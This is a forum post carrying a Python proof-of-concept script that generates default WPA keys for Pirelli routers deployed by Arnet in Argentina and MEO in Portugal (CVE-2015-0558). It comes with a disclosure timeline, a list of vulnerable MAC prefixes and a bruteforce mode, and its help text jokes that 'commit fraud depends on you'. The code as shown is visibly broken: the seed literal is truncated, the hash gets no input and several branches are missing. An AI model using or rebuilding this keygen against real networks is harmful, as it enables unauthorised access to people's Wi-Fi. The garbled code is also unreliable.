Jump to content
Sign in to follow this  

Pirelli Router P.DG-A4001N WPA Key Reverse Engineering Rev 2

Recommended Posts

#!/usr/bin/env python
# -*- coding: utf-8 -*-

@license: GPLv3
@author : Eduardo Novella
@ARNetOnline via Twitter @enovella_
2014-09-15 Send a message via website, still looking for a simple mail ([url]http://www.telecom.com.ar/hogares/contacto_tecnico.html[/url])
2014-09-16 Send another message to Arnet via website. First reply via twitter where they redirect me to the website form.
2014-09-19 Direct message via twitter. I talk with them about the critical vulnerability and offer them an email with PGP key
2014-09-20 More twitter PM about the same. They do not want to be aware about the problem though.
2014-09-23 I assume that Arnet does not care about its clients' security at all regarding its little interest.
2014-09-24 I send the problem to the vendor ADB Pirelli via website form
2014-09-28 I send the problem to the vendor ADB Pirelli via email to Switzerland
2015-01-05 Full disclosure and CVE-2015-0558 assigned

2015-04-01 I receive an email confirming that the Portuguese ISP "MEO" uses the same algorithm
2015-04-05 Send a message to @MEOpt via Twitter @enovella_
2015-04-05 I got response in matter of minutes \o/
2015-04-05 I send an email to [email]luis-oliveira-cc@telecom.pt[/email] , stating the reference 3-78405621289 in email subject
2015-05-07 Full disclosure

[*] Changelog :
2015-05-06 v1.4 Added MEO routers in Portugal. Essid ADSLPT-ABXXXXX
2015-02-01 v1.3 Final version, hopefully
2015-01-12 v1.2 Confusion between LAN and WLAN mac address
2015-01-10 v1.1 --allKeys flag added
2014-09-11 v1.0 First PoC working


import re
import sys
import hashlib
import argparse

DATEVERSION = '2015-05-06'
URL = 'http://www.ednolo.alumnos.upv.es'

def genkey(mac,stdout='True'):
seed = ('\x64\xC6\xDD\xE3\xE5\x79\xB6\xD9\x86\x96\x8D\x34\x45\xD2\x3B\x15' +

lookup = '0123456789abcdefghijklmnopqrstuvwxyz'

sha256 = hashlib.sha256()

digest = bytearray(sha256.digest())

if (stdout):
print "[+] SHA256 : %s" % sha256.hexdigest()

return ''.join([lookup[x % len(lookup)] for x in digest[0:10]])

def printTargets():
print "[+] Possible vulnerable targets so far:"
for t in targets:
print ("\t bssid: {0:s}:XX:XX:XX \t essid: WiFi-Arnet-XXXX, ADSLPT-ABXXXXX".format(t.upper()))


def checkTargets(bssid):
supported = False
for t in targets:
if ( bssid.upper().startswith(t) ):
supported = True
if (not supported):
print "[!] Your bssid looks like not supported! Generating anyway."

def addIncToMac(mac_str, inc):
mac = bytearray.fromhex('%012x' %(int(mac_str,16) + inc))
sys.exit('[!] Use real input ')
return mac

def main():

global targets
version = " {0:d}.{1:d} [{2:s}] ----> {3:s}".format(VERSION,SUBVERSION,DATEVERSION,URL)
targets = ['00:08:27','00:13:C8','00:17:C2','00:19:3E','00:1C:A2','00:1D:8B','00:22:33','00:8C:54',

parser = argparse.ArgumentParser(description='''>>> PoC WPA keygen for WiFi Networks deployed by Arnet in Argentina and
MEO in Portugal. So far only WiFi networks with essids like WiFi-Arnet-XXXX
or ADSLPT-ABXXXXX and manufactured by Pirelli are likely vulnerable. See
[url]http://ednolo.alumnos.upv.es/[/url] for more details. Twitter: @enovella_ and
email: ednolo[at]inf.upv.es. This software is used just as proof-of-concept,
commit fraud depends on you! ''',
epilog='''(+) Help: python %s -b 74:88:8B:AD:C0:DE ''' %(sys.argv[0])

maingroup = parser.add_argument_group(title='required')
maingroup.add_argument('-b','--bssid', type=str, nargs='?', help='Target mac address')
parser.add_argument('-v', '--version', action='version', version='%(prog)s'+version)
command_group = parser.add_mutually_exclusive_group()
command_group.add_argument('-l','--list', help='List all vulnerable targets', action='store_true')
command_group.add_argument('-a','--allkeys', help='Bruteforce mode', action="store_true")

args = parser.parse_args()

if args.list:
elif args.bssid:
mac_str = re.sub(r'[^a-fA-F0-9]', '', args.bssid)
if len(mac_str) != 12:
sys.exit('[!] Check MAC format!\n')

print '[+] MAC : %s' % args.bssid

if (args.allkeys):
print '\n[+] WPA keys for SSID: WiFi-Arnet-XXXX (Argentina)'
for i in xrange(-2,5):
mac = addIncToMac(mac_str,i)
print '%-10s' % ((genkey(mac, False)))

print '\n[+] WPA keys for SSID: ADSLPT-ABXXXXX (Portugal)'
for i in xrange(-2,5):
mac = addIncToMac(mac_str,i)
print '%-10s' % ((genkey(mac, False)[:8]))

wpa = genkey((addIncToMac(mac_str,0)), False)
print '[+] WPA key : %-10s\t%-10s' % (wpa, "SSID: WiFi-Arnet-XXXX (Argentina)")
print '[+] WPA key : %-10s\t%-10s' % (wpa[:8], "SSID: ADSLPT-ABXXXXX (Portugal)" )

sys.exit('[!] Are you trying to crash me? ')

if __name__ == "__main__":


Share this post

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this  

  • Create New...